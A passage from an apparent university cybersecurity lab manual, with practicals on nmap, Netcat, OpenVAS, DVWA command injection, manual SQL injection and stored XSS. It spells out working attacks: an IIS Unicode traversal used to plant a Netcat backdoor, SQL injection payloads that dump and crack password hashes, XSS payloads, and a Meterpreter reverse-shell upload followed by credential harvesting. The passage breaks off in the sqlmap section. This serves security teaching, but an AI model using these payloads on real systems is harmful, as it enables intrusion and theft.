MAC Address: 00:21:2C:82:08:87 (SemIndia System Private Limited)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 - 2.6.28
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at

http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.29 seconds
So nmap is able to detect that the operating system is Linux. It is important to note that OS
fingerprint report by nmap may not be very accurate. It tries to discover the operating system
by using some TCP header fields, but this technique cannot tell the exact linux distro for
example. It can however in most cases give a correct indication as to whether the target is a
linux or windows system.
Here is the scan result of a windows machine for
example $ sudo nmap -O ############

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-16 14:20 IST

Nmap scan report for ############ (###.###.###.###)
Host is up (0.39s latency).
Not shown: 987 filtered ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
53/tcp open domain
80/tcp open http

110/tcp open pop3

143/tcp open imap
443/tcp open https
1433/tcp open ms-sql-s
2006/tcp open invokator
3306/tcp open mysql
3389/tcp open ms-term-serv
8443/tcp open https-alt
49158/tcp open unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1
closed port
Device type: general purpose
Running: Microsoft Windows 2008
OS details: Microsoft Windows Server 2008 Beta 3

[Enrollment No] Page 22

Cyber Security 3150714

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 60.22 seconds

7) Aggressive scanning

The -A option can be used to perform an aggressive scan which is equal to - "enable OS
detection and Version detection, Script scanning and Traceroute". Here is a quick example
$ sudo nmap -A -T4 ##########
[sudo] password for enlightened:

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-16 15:02 IST

Nmap scan report for ########## (###.###.###.###)
Host is up (0.38s latency).

PORT STATE SERVICEVERSION

21/tcp open ftp Microsoft ftpd
25/tcp open smtp MailEnable smptd 4.26--
53/tcp open domain ISC BIND hostmaster
80/tcp open http Microsoft IIS webserver 7.0
|_html-title: Welcome to Homepage
110/tcp open pop3 MailEnable POP3 Server
|_pop3-capabilities: OK(K Capability list follows) USER TOP UIDL
143/tcp open imap MailEnable imapd
|_imap-capabilities:IMAP4rev1IMAP4CHILDRENIDLEAUTH=LOGIN
AUTH=CRAM-MD5
2006/tcp open http Microsoft IIS httpd 7.0
| html-title: Document Moved
|_Requested resource was http://##########/ABC
3306/tcp open mysql MySQL (unauthorized) 3389/tcp
open microsoft-rdp Microsoft Terminal Service 8443/tcp
open ssl/http Microsoft IIS webserver 7.0

[Enrollment No] Page 23

Cyber Security 3150714
|_sslv2: server still supports SSLv2
|_html-title: Site doesn't have a title (text/html).
49158/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and
1closed port
Device type: general purpose
Running: Microsoft Windows 2008
OS details: Microsoft Windows Server 2008 Beta 3
Network Distance: 16 hops
Service Info: Host: CL-T192-200CN.home; OS: Windows

TRACEROUTE (using port 21/tcp)

HOP RTT ADDRESS
1 8.13 ms 192.168.1.1
2 44.42 ms 117.194.224.1
3 40.74 ms 218.248.162.230
4 70.79 ms 218.248.255.82
5 124.74 ms 115.114.130.33.STATIC-Chennai.vsnl.net.in (115.114.130.33)
6 148.41 ms 172.31.19.146
7 145.28 ms ix-0-100.tcore1.MLV-Mumbai.as6453.net (180.87.38.5)
8 366.30 ms if-2-2.tcore2.MLV-Mumbai.as6453.net (180.87.38.2)
9 375.30 ms if-6-2.tcore1.L78-London.as6453.net (80.231.130.5)
10 372.00 ms if-2-2.tcore2.L78-London.as6453.net (80.231.131.1)
11 428.80 ms if-20-2.tcore2.NYY-NewYork.as6453.net (216.6.99.13)
12 442.52 ms if-1-0-0.mcore3.MTT-Montreal.as6453.net (216.6.99.10)
13 382.34 ms if-0-3-1-0.tcore1.MTT-Montreal.as6453.net (64.86.31.53)
14 364.63 ms 64.86.31.42
15 16 369.24 ms ###.###.###.###

OS and Service detection performed.

[Enrollment No] Page 24

Cyber Security 3150714
Practical: 3

Aim: TCP / UDP connectivity using Netcat

NetCat – The "Swiss Army Knife"

Description

Netcat is a utility that is able to write and read data across TCP and UDP network
connections. If you are responsible for network or system security it is essential that you
understand the capabilities of Netcat. Netcat can be used as port scanner, a backdoor, a port
redirector, a port listener and lots of other cool things too. It's not always the best tool for the
job, but if I was stranded on an island, I'd take Netcat with me ☺ During this tutorial I'll
demonstrate a complete hack, using Netcat only, just to point out how versatile it is.

Port scanning with Netcat

A scanning example from Hobbit is "nc -v -w 2 -z target 20-30". Netcat will try connecting
to every port between 20 and 30 [inclusive] at the target, and will likely inform you about an
FTP server, telnet server, and mailer along the way. The -z switch prevents sending any data
to a TCP connection and very limited probe data to a UDP connection, and is thus useful as a
fast scanning mode just to see what ports the target is listening on. To limit scanning speed if
desired, -i will insert a delay between each port probe. Even though Netcat can be used for
port scanning it isn’t its strength. A tool such as Nmap is better suited for port scanning.

We scanned 192.168.1.1, ports 1-200. We can see that among others, port 80, 21 and 25 are
open.

Banner Grabbing with Netcat

[Enrollment No] Page 25

Cyber Security 3150714
So we're interested in knowing what's running behind port 80 and 21. We can use Netcat to
grab port banners in the following way:

So we know it’s probably a Windows 2000 machine as it's running IIS 5.0 and Microsoft FTP
Service.

Let's try to send a malformed URL which attempts to exploit the File Traversal vulnerability
in unpatched IIS servers (Pre SP3). We will be using Netcat to Check for the vulnerability,
and if found (and it will!), we will upload Netcat to the IIS server and demonstrate how we
can use Netcat as a backdoor.

[Enrollment No] Page 26

Cyber Security 3150714
If you do not know what the Unicode File traversal exploit is, you can check the "IIS
Unicode File Traversal" tutorial, or read it up on the net.

Basically this exploit allows us to "break out" of C:\inetpub\wwwroot and explore and
execute programs anywhere on the attacked machine.

The point here isn't hacking IIS, but the use of Netcat as a backdoor. Don't get
distracted by the whole "hacking into IIS" thing.

Voila! We've sent the URL:

http://192.168.1.90/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ to the vulnerable
IIS server and what we see is a directory listing of the IIS server C drive. Great! Now we
want to upload Netcat to the IIS server, so we'll use TFTP and integrate the TFTP
commands into the malformed URL.

Notice that the URL has a plus (+) sign between each command. So the command:

tftp –I 192.168.1.9 GET nc.exe

Is transformed to:

http://<Exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe

[Enrollment No] Page 27

Cyber Security 3150714

Also take a note of your TFTP server, to see if it has successfully uploaded the nc.exe file:

Netcat as a BackDoor

So now we have Netcat uploaded to the IIS server, we want to use it to create a backdoor, in
order to get a remote command prompt.
In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS server (lets
choose port 10001) and then we can connect to this port from our attacking machine…using
Netcat of course!

The command we want to give on the server looks like this: nc -L

-p 10001 -d -e cmd.exe

Here's what that command does:

nc - tells Windows to run the nc.exe file with the following arguments: -L
Tells netcat to not close and wait for connections
-p Specifies a port to listen for a connection on
-d Tells Netcat to detach from the process we want it to run.
-e Tells what program to run once the port is connected to (cmd.exe)
If we now want to convert this command for Unicode URL use, it will look like this:

http://<Exploit URL>/c+nc+-L+-p+10001+-d+-e+cmd.exe

Now we will execute Netcat on the remote IIS machine:

[Enrollment No] Page 28

Cyber Security 3150714

This should have started Netcat listening on port 10001 on the IIS machine and should
connect the cmd.exe process to the connection stream. From our machine we will try to
connect to the Netcat on the IIS server.

Tada! We have now "Shoveled a Shell" using Netcat. We effectively have a remote command

prompt of the IIS server, as can be seen from the IPConfig.

[Enrollment No] Page 29

Cyber Security 3150714
Transferring files using Netcat

Let's look at other possibilities Netcat can provide. Sat we wanted to transfer a file called
hack.txt to the IIS server, and for some reason we don't want to TFTP the file. We can use
Netcat to transfer files from one system to another.

To receive a file named hack.txt on the destination system start Netcat on the IIS server
with the following command:

nc –l –p 1234 >hack.txt

On our source system (the attacking computer) we send a file named hack.txt to the IIS
machine with the following command:

nc destination 1234 <hack.txt

Issue a ^C on the source system and your done. Be sure to check the file to be sure it is the
same size as the original.

This is what hack.txt looks like

[Enrollment No] Page 30

Cyber Security 3150714
And…Voila!

We can see that the file hack.txt has been transferred to the target system, via port 1234.

These are just a few of the wonderful option Netcat has to offer. Definitely worth RTFMing.
Imagine all the wonderful possibilities of overcoming firewalls with netcat…

[Enrollment No] Page 31

Cyber Security 3150714

Practical: 4

Aim: Network vulnerability using OpenVAS

1 Introduction

In this exercise we will show a popular open source vulnerability scanner called OpenVAS
(Open Vulnerability Assessment System). OpenVAS is the evolution of a previous project
called Nessus, which became a proprietary tool. The actual security scanner is accompanied
with a daily updated feed of Network Vulnerability Tests (NVTs), over 20,000 in total (as of
January 2011).

2 Goals

Install OpenVAS server and client packages on Ubuntu Update

OpenVAS vulnerability tests

Create a user for scanning

Learn to run scans in batch mode from the command-line client

3 Notes

Commands preceded with \$" imply that you should execute the command as a
general user - not as root.

Commands preceded with \#" imply that you should be working as root.

Commands with more speci c command lines (e.g. \RTR-GW>" or \mysql>")

imply that you are executing commands on remote equipment, or within another
program.

4 Installation

4.1 Install the server, client and plugin packages

$ sudo apt-get install openvas-server openvas-client openvas-plugins-base \

openvas-plugins-dfsg

4.2 Update the vulnerability database

$ sudo openvas-nvt-sync

4.3 Add a user to run the client

$ sudo openvas-adduser Login: sysadm

[Enrollment No] Page 32

Cyber Security 3150714

Authentication (pass/cert) [pass]: HIT ENTER

Login password: USE CLASS PASSWD

You will then be asked to add \User rules".

Ideally, you will want to only allow scanning on hosts that are under your control. To
understand the syntax, check the openvas-adduser man page.

Let's allow this user to scan hosts in our lab network. Type:
Accept 10.10.0./16 default deny
type ctrl-D to exit, and then accept.
5 Operation

5.1 Starting the server

$ sudo service openvas-server start
The server has to load thousands of vulnerability checks, which takes VERY LONG,
especially on a machine that is not very powerful. Most likely, you will not be able to run
this on the virtual NSRC lab.
On a production setup, you will need a machine with multiple processors/ cores and a quite
a bit of RAM, especially if you will be scanning many hosts.

5.2 Running a scan

Create a text file with a list of hosts/networks to scan.

$ cd /home/sysadm $ vi scanme.txt

Add one host, network per line, like this:

10.10.0.250

10.10.2.5 ... etc.

Check the manual for the client to understand its parameters:

$ man openvas-client
Then, run the client like this:
$ sudo openvas-client -q 127.0.0.1 9390 sysadm nsrc+ws scanme.txt \ openvas-
output-.html -T txt -V -x
Alternatively, you can export into prettier HTML format with:
$ sudo openvas-client -q 127.0.0.1 9390 sysadm nsrc+ws scanme.txt \ openvas-output.txt
-T html -V -x

You might have to transfer that file to your laptop so that you can open it with a
browser.

[Enrollment No] Page 33

Cyber Security 3150714

Practical: 5
Aim: Web application testing using DVWA

1) Background Information

 Vulnerable Web App (DVWA)? What is Damn

o Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application
that is damn vulnerable.
o Its main goals are to be an aid for security professionals to test their skills and
tools in a legal environment, help web developers better understand the
processes of securing web applications and aid teachers/students to
teach/learn web application security in a class room environment.

 What is Command Execution?

o Command Execution is where a website application provides the

ability to execute system commands.

 What is a Command Injection Attack?

o The purpose of the command injection attack is to inject and execute

commands
specified by the attacker in the vulnerable application.
o In situations like this, the application, which executes unwanted system
commands, is like a pseudo system shell, and the attacker may
use it as an authorized system user.
o Note, the commands are executed with the same privileges as the application
and/or web server.
o Command injection attacks are possible in most cases because of lack of
correct input data validation, which can be manipulated by the attacker
(forms, cookies, HTTP headers etc.).

 What is Command Injection Harvesting?

o Command Injection Harvesting is where a malicious user manipulates a

website command execution application to render sensitive data. (E.g.,
usernames, config files, directory and file listings, etc).
 Unix/Linux Example: 9.9.9.9; cat /etc/passwd
 Windows Example: 9.9.9.9 && dir
 Pre-Requisite Lab

 Lab Notes

o In this lab we will do the following:

1. We will test Command Execution where Security is set to low

[Enrollment No] Page 34

Cyber Security 3150714
2. We will demonstrate how other linux/unix commands can be
appended to an IP Address for execution.
3. We will explorer the code that allows for malicious use.

Section 1: Configure Fedora14 Virtual Machine Settings

1. Open Your VMware

Player o
Instructions:
1. On Your Host Computer, Go To
2. Start --> All Program --> VMWare --> VMWare Player

2. Edit Fedora 14 Virtual Machine Settings

o Instructions:
1. Highlight fedora14
2. Click Edit virtual machine settings

3. Edit Network
Adapter o
Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Click on the OK Button.

[Enrollment No] Page 35

Cyber Security 3150714

Section 2: Login to Fedora14

1. Start Fedora14 VM
Instance o
Instructions:
1. Start Up VMWare Player
2. Select Fedora14
3. Play virtual machine

[Enrollment No] Page 36

Cyber Security 3150714
2. Login to
Fedora14 o
Instructions:
1. Login: student
2. Password: <whatever you set it to>.

Section 3: Open Console Terminal and Retrieve IP Address

1. Start a Terminal Console

o Instructions:
1. Applications --> Terminal
o

2. Switch user to root

[Enrollment No] Page 37

Cyber Security 3150714
o Instructions:
1. su - root
2. <Whatever you set the root password to>

3. Get IP Address

o Instructions:

[Enrollment No] Page 38

Cyber Security 3150714

1. ifconfig -a
o Notes:
As indicated below, my IP address is
192.168.1.106.Please record your IP address.

Section 4: Start Up Damn Vulnerable Web App (DVWA)

1. Start up a Web
Browser o
Instructions:
1. Applications --> Internet --> Firefox
o Notes:
You can open up a Web browser on any Operating System on
yournetwork.
Working with DVWA does not have to be done on your Fedora
machine,the only requirement to play with DVWA is a follow
1. The Fedora Server is on the Network.
2. httpd is running
3. mysqld is running

DVWA Database setup

Instructions:

[Enrollment No] Page 39

Cyber Security 3150714
0. http://192.168.1.106/dvwa/login.php
 Replace 192.168.1.106 with the IP Address obtained from
Section 3, Step 3.
1. Username: admin
2. Password: password
 "password" is the default password for user admin.

Set Website Security Level (Part 1)

Instructions:
0. Click on DVWA Security

Set Website Security Level (Part 2)

[Enrollment No] Page 40

Cyber Security 3150714
Instructions:
0. Select Low
1. Click Submit

Section 5: Command Execution

1. Command
Execution o
Instructions:
1. Click on Command Execution

[Enrollment No] Page 41

Cyber Security 3150714

2. Execute
Ping o
Notes:
 Below we are going to do a simply ping test using the web interface.
 As an example, ping something on your network.
 Use the IP Address obtained in Section 3, Step 3 if you have nothing
else
to ping.
Instructions:
0. 192.168.1.106
1. Click Submit

cat /etc/password (Attempt 1)

Instructions:

[Enrollment No] Page 42

Cyber Security 3150714

0. cat /etc/passwd
1. Click Submit
Notes:
 Notice that either a messaging saying illegal IP address was
displayed or nothing was returned.

cat /etc/password (Attempt 2)

Instructions:
0. 192.168.1.106; cat /etc/passwd
1. Click Submit
Notes:
 Notice that we are now able to see the contents of the /etc/passwd file.

Looking at the weakness

Instructions:
0. Bring up a terminal window (See Section 3, Step 1, if you don't
know how)
1. cat /var/www/html/dvwa/vulnerabilities/exec/source/low.php
Notes:
0. Notice the two shell_exec lines.
1. These are the lines that execute ping depending on which
Operating System is being used.
2. In Unix/Linux command, you can run multiple command separated
by a ";".
3. Notice the code does not check that if $target matches an IP Address
 \d+.\d+.\d+.\d+, where "\d+" represents a number with
the possibility of multiple digits, like 192.168.1.106.

[Enrollment No] Page 43

Cyber Security 3150714

4. The code allows for an attacker to append commands behind

the IP Address.
1. 192.168.1.106; cat /etc/passwd

Copy the /etc/passwd file to /tmp

Instructions:
0. 192.168.1.106; cat /etc/passwd | tee /tmp/passwd
Note:
 Here we are not only displaying the contents of /etc/passwd on
the webpage, but also we are copying the /etc/passwd file to
the /tmp directory.

[Enrollment No] Page 44

Cyber Security 3150714

Practical: 6
Aim: Manual SQL injection using DVWA

2) Background Information

 What is Damn Vulnerable Web App (DVWA)?

o Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application
that is damn vulnerable.
o Its main goals are to be an aid for security professionals to test their skills and
tools in a legal environment, help web developers better understand the
processes of securing web applications and aid teachers/students to
teach/learn web application security in a class room environment.

 What is a SQL Injection?

o SQL injection (also known as SQL fishing) is a technique often used to attack
data driven applications.
o This is done by including portions of SQL statements in an entry field in an
attempt to get the website to pass a newly formed rogue SQL command to
the database (e.g., dump the database contents to the attacker). SQL
injection is a code injection technique that exploits a security vulnerability
in an application's
software.
o The vulnerability happens when user input is either incorrectly filtered for
string literal escape characters embedded in SQL statements or user input is
not strongly typed and unexpectedly executed. SQL injection is mostly known
as an attack vector for websites but can be used to attack any type of SQL
database.

 What is SQL Injection Harvesting?

o SQL Injection Harvesting is where a malicious user supplies SQL statements
to render sensitive data such as usernames, passwords, database tables, and
more.

After Login into Backtrack, Login into DVWA to perform manual SQL injection.

Section 1: Manual SQL Injection

1. SQL Injection
Menu o
Instructions:
1. Select "SQL Injection" from the left navigation menu.

[Enrollment No] Page 45

Cyber Security 3150714

2. Basic Injection

o Instructions:
1. Input "1" into the text box.
2. Click Submit.

[Enrollment No] Page 46

Cyber Security 3150714
3. Note, webpage/code is supposed to print ID, First name, and Surname
to

the screen.
o Notes(FYI):
 Below is the PHP select statement that we will be exploiting,
specifically $id.
 $getid = "SELECT first_name, last_name FROM users
WHERE
user_id = '$id'";
Always True Scenario
Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' or '0'='0
1. Click Submit
Notes(FYI):
 In this scenario, we are saying display all record that are false
and all records that are true.
 %' - Will probably not be equal to anything, and will be false.
 '0'='0' - Is equal to true, because 0 will always equal 0.
 Database Statement
 mysql> SELECT first_name, last_name FROM users
WHERE user_id = '%' or '0'='0';

Display Database Version

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' or 0=0 union select null, version() #
1. Click Submit

[Enrollment No] Page 47

Cyber Security 3150714
Notes(FYI):

 Notice in the last displayed line, 5.1.60 is displayed in the surname.

 This is the version of the mysql database.

Display Database User

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' or 0=0 union select null, user() #
Notes(FYI):
 Notice in the last displayed line, root@localhost is displayed in the

[Enrollment No] Page 48

Cyber Security 3150714

surname.
 This is the name of the database user that executed the behind the
scenes PHP code.

Display Database Name

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' or 0=0 union select null, database() #
Notes(FYI):
Notice in the last displayed line, dvwa is displayed in the
surname.This is the name of the database.

Display all tables in information_schema

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' and 1=0 union select null, table_name
from information_schema.tables #
1. Click Submit
Notes(FYI):
 Now we are displaying all the tables in the information_schema
database.
 The INFORMATION_SCHEMA is the information database, the
place that stores information about all the other databases that the
MySQL server maintains.

[Enrollment No] Page 49

Cyber Security 3150714

Display all the user tables in information_schema

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user
%'#
1. Click Submit
Notes(FYI):
 Now we are displaying all the tables that start with the prefix "user" in
the information_schema database.

[Enrollment No] Page 50

Cyber Security 3150714

Display all the columns fields in the information_schema user table

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' and 1=0 union select null,
concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #
1. Click Submit
Notes(FYI):
 Now we are displaying all the columns in the users table.
 Notice there are a user_id, first_name, last_name, user and
Password column.

Display all the columns field contents in the information_schema user table

Instructions:
0. Input the below text into the User ID Textbox (See Picture).
 %' and 1=0 union select null,
concat(first_name,0x0a,last_name,0x0a,user,0x0a,password)
from users #
1. Click Submit
Notes(FYI):
 Now we have successfully displayed all the necessary
authentication information into this database.

[Enrollment No] Page 51

Cyber Security 3150714

Section 2: Create Password Hash File

1. Create Password Hash

File o
Instructions:
1. Highlight both admin and the password hash
2. Right Click
3. Copy

[Enrollment No] Page 52

Cyber Security 3150714
2. Open Notepad
o Instructions:
1. Applications --> Wine --> Programs --> Accessories --> Notepad

3. Paste in Notepad
o Instructions:
1. Edit --> Paste

[Enrollment No] Page 53

Cyber Security 3150714
4. Format in
Notepad o
Instructions:
1. Place a ":" immediately after admin
2. Make sure your cursor is immediately after the ":" and hit the
delete button.
3. Now you should see the user admin and the password hash separated
by a ":" on the same line.
4. Cut the username and password combinations for gordonb, 1337,
pablo, and smitty from (Section 11, Step 1) and paste in this file as
well.

Save in Notepad

[Enrollment No] Page 54

Cyber Security 3150714
o Instructions:
1. Navigate to --> /pentest/passwords/john
2. Name the file name --> dvwa_password.txt
3. Click Save

Section 3: Proof of Lab Using John the Ripper

1. Proof of Lab
o Instructions:
1. Bring up a new terminal, see (Section 7, Step 1)
2. cd /pentest/passwords/john
3. ./john --format=raw-MD5 dvwa_password.txt
4. date
5. echo "Your Name"
 Replace the string "Your Name" with your actual name.
 e.g., echo "John Gray"
o Proof of Lab Instructions:
1. Do a <PrtScn>
2. Paste into a word document
3. Upload to Moodle

[Enrollment No] Page 55

Cyber Security 3150714

Practical: 7
Aim: Web XSS using DVWA

Section 1: Fix Stored Cross Site Scripting (XSS) Comment Box

1. Fix Character
Limit o
Instructions:
1. cd /var/www/html/dvwa/vulnerabilities/xss_s/
2. vi index.php
3. Continue to Next Step
o Notes(FYI):
1. By default, the comment box in the XSS stored GUI will only allow
for 50 characters. So we are going to change the character limit to 250
characters to demonstrate the following attacks.

2. Search for
mtxMessage o
Instructions:
1. Press the "/" key
 This will put in you search mode in the bottom left part of the
screen.
2. Type "mtxMessage" and hit <Enter>

[Enrollment No] Page 56

Cyber Security 3150714

3. Replace number

o Instructions:
1. Your cursor should now be on the "m" on the word mtxMessage.
2. Right Arrow over to the 5 after maxlength.
3. Press "i" and type "2"
 This will place the number 2 in front of the number 50.
4. Press the <Esc> key
5. Type ":wq!"

[Enrollment No] Page 57

Cyber Security 3150714
After this step, Configure Backtrack Virtual Machine settings as:

1. Edit BackTrack Virtual Machine

Settings o Instructions:
1. Highlight BackTrack5R1
2. Click Edit virtual machine settings
2. Edit Network Adapter
o Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Do not Click on the OK Button

Now, Login into Backtrack, Open Console Terminal and Retrive IP Address.

Section 2: Login to DVWA

1. Start Firefox
o Instructions:
1. Click on Firefox
2. Enable JavaScript (Part 1)
o Notes(FYI):
 Typically, JavaScript popup boxes are disabled by default. The next
two steps enable JavaScript popup boxes.
Instructions:
0. Edit --> Preferences

[Enrollment No] Page 58

Cyber Security 3150714

Enable JavaScript (Part 2)

Instructions:
0. Click on Content
1. Uncheck Block pop-up windows
2. Check Enable JavaScript
3. Click the Close Button

Login to DVWA

Notes(FYI):
 Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3,
Step 3).
Instructions:
0. Start up Firefox on BackTrack
1. Place http://192.168.1.106/dvwa/login.php in the address bar.
2. Login: admin
3. Password: password
4. Click on Login

[Enrollment No] Page 59

Cyber Security 3150714

Section 3: Set Security Level

1. Set DVWA Security

Level o
Instructions:
1. Click on DVWA Security, in the left hand menu.
2. Select "low"
3. Click Submit

[Enrollment No] Page 60

Cyber Security 3150714

Section 4: XSS Stored Basic Exploit Test

1. XSS Stored Menu

o Instructions:
1. Select "XSS Stored" from the left navigation menu.

2. Basic XSS Test

o Instructions:
1. Name: Test 1
2. Message: <script>alert("This is a XSS Exploit Test")</script>
3. Click Sign Guestbook

[Enrollment No] Page 61

Cyber Security 3150714

3. View Test 1
Results o
Notes(FYI):
1. Notice that the JavaScript alert we just created is now displayed.
2. Every Time a user comes to this forum, this XSS exploit will be
displayed.
3. This exploit can be easily modified to capture cookie/session
information for future Man-in-Middle attacks.
o Instructions:
1. Click OK

Section 5: XSS Stored IFRAME Exploit Test

1. Reset Database

[Enrollment No] Page 62

Cyber Security 3150714

o Instructions:
1. Select "Setup" from the left menu navigation.
2. Click on the Create / Reset Database
Button. o Notes(FYI):
We need to reset the database otherwise the each XSS exploit will
appear
for each example.
XSS Stored Menu
Instructions:
0. Select "XSS Stored" from the left navigation menu.

XSS Test 2

[Enrollment No] Page 63

Cyber Security 3150714

Instructions:
0. Name: Test 2
1. Message: <iframe src="http://www.cnn.com"></iframe>
2. Click Sign Guestbook

View Test 2 Results

Notes(FYI):
0. Notice that CNN is displayed under "Test 2's" Message.
 This is a powerful exploit because a user could use SET to
create Malicious cloned website and place in here.
 e.g., Social Engineering Toolkit (SET): Lesson 3:
Create Malicious Weblink, Install Virus, Capture
Forensic Images

Section 6: XSS Stored COOKIE Exploit Test

1. Reset Database
o Instructions:
1. Select "Setup" from the left menu navigation.
2. Click on the Create / Reset Database
Button. o Notes(FYI):
We need to reset the database otherwise the each XSS exploit will
appearfor each example.

[Enrollment No] Page 64

Cyber Security 3150714

XSS Stored Menu

Instructions:
0. Select "XSS Stored" from the left navigation menu.

XSS Test 3

Instructions:
0. Name: Test 3
1. Message: <script>alert(document.cookie)</script>
2. Click Sign Guestbook

[Enrollment No] Page 65

Cyber Security 3150714

View Cookie

Notes(FYI):
0. Below is the cookie/session that the webserver establishes with the
current browser session.
1. An attacker could easily modify this XSS script to send the cookie to a
remote location instead of displaying it.
2. Image if this was a bank website. Every time a user logs in their cookie
information could be sent to a remote location.
Instructions:
0. Click OK.

[Enrollment No] Page 66

Cyber Security 3150714

1. Open a console terminal o Instructions:

1. Click on the console terminal

2. Create msfpayload
o Notes(FYI):
 Replace 192.168.1.105 with your BackTrack IP Address obtained from
(Section 7, Step 2).
Instructions:
0. mkdir -p /root/backdoor
1. cd /root/backdoor
2. msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105
LPORT=4444 R > FORUM_BUG.php
3. ls -l FORUM_BUG.php

Edit FORUM_BUG.php

Instructions:
0. vi FORUM_BUG.php

[Enrollment No] Page 67

Cyber Security 3150714

Remove the "#" character

Instructions:
0. Press "x" to delete the "#" character on the first line.
1. Press <Esc>
2. Type ":wq!"

Section 8: Upload PHP Payload

1. Upload Menu
o Instructions:
1. Select "Upload" from the left navigation menu.
2. Click Browse

[Enrollment No] Page 68

Cyber Security 3150714

2. Navigate to
FORUM_BUG.php o
Instructions:
1. Click on root
2. Click on FORUM_BUG.php
3. Select Open

3. Upload
FORUM_BUG.php
o Instructions:
1. Click the Upload button

[Enrollment No] Page 69

Cyber Security 3150714

Section 9: Start PHP Payload Listener

1. Open a console
terminal o
Instructions:
1. Click on the console terminal

2. Start msfconsole
o Instructions:
1. msfconsole

[Enrollment No] Page 70

Cyber Security 3150714
3. Start PHP
Listener o
Notes(FYI):
 Replace 192.168.1.105 with the BackTrack IP Address obtained from
(Section 7, Step 2).
Instructions:
0. use exploit/multi/handler
1. set PAYLOAD php/meterpreter/reverse_tcp
2. set LHOST 192.168.1.105
3. set LPORT 4444
4. exploit
5. Continue to Next Section

Section 10: XSS Stored window.location Exploit Test

1. Reset Database

2.

[Enrollment No] Page 71

Cyber Security 3150714
o Instructions:
1. Select "Setup" from the left menu navigation.
2. Click on the Create / Reset Database
Button. o Notes(FYI):
We need to reset the database otherwise the each XSS exploit will
appearfor each example.

XSS Stored Menu

Instructions:
0. Select "XSS Stored" from the left navigation menu.

XSS Test 4

[Enrollment No] Page 72

Cyber Security 3150714
Instructions:
0. Name: Test 4
1. Message:
 <script>window.location="http://192.168.1.106/dvwa/
hackable/upl oads/FORUM_BUG.php" </script>
 Replace 192.168.1.106 with the IP Address obtain from
Fedora 14 in (Section 3, Step 3).
2. Click Sign Guestbook
3. Click OK when the Test 1 Message is displayed
4. Continue To Next Section

Viewing XSS Test 3 Results

Instructions:
0. Notice how the "Connecting..." appears to be in an infinite loop.
1. This will continue for the duration of the PHP/MSF PAYLOAD
exploit.
2. Continue To Next Section

Section 11: View Metasploit Session

1. View Metasploit
Session o
Notes(FYI):
1. Notice that BackTrack now has a connection into the Fedora 14
Webserver.
2. Continue to Next Step.

[Enrollment No] Page 73

Cyber Security 3150714

2. Establishing a
Shell o
Instructions:
1. shell
 Establishes a "sh" shell.
2. tail /etc/passwd
 This produces a potential prospect list for a ssh brute force
attack.

3. Find Configuration
Files o
Instructions:
1. whoami
 Displays the name of the user.
2. grep apache /etc/passwd

[Enrollment No] Page 74

Cyber Security 3150714
 The goal of this command is obtaining the home directory for
the apache username.
3. find /var/www/* -print | grep config
 Here I am wanting to find all the configuration files in the
/var/www directory.

4. Exploit the Configuration File

o Instructions:
1. grep "db_" /var/www/html/dvwa/config/config.inc.php
 This produces the database name, username, and password
information to log into the mysql database.
2. echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
 This command produces a table list of the dvwa database.

[Enrollment No] Page 75

Cyber Security 3150714

3. echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD

 This command describes the columns of the users table in the
dvwa datase.
4. echo "select user,password from dvwa.users;" | mysql -uroot -
pdvwaPASSWORD
 This command displays the user and password information for
each user in the dvwa.users table.

Exploit the Configuration File

o Instructions:
1. echo "<pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
 Place the html <pre> tag in the xss.html file.
 The <pre> is used as a pre-formatter.
2. echo "select user,password from dvwa.users;" | mysql -uroot -
pdvwaPASSWORD >>
/var/www/html/dvwa/hackable/uploads/xss.html
 Place user and password for the dvwa.users table in the
xss.html file.
3. echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
 Place the close html </pre> tag in the xss.html file.
4. echo "<br>Your Name<br>" >>
/var/www/html/dvwa/hackable/uploads/xss.html
 Replace the string "Your Name" with your actual name.
5. date >> /var/www/html/dvwa/hackable/uploads/xss.html

[Enrollment No] Page 76

Cyber Security 3150714

Practical: 8
Aim: Automated SQL injection with SqlMap

Sqlmap is one of the most popular and powerful sql injection automation tool out there.
Given a vulnerable http request url, sqlmap can exploit the remote database and do a lot of
hacking like extracting database names, tables, columns, all the data in the tables etc. It can
even read and write files on the remote file system under certain conditions. Written in
python it is one of the most powerful hacking tools out there. Sqlmap is the metasploit of sql
injections.

1) Vulnerable Urls

Lets say there is a web application or website that has a url in it like this

http://www.site.com/section.php?id=51

and it is prone to sql injection because the developer of that site did not properly escape the
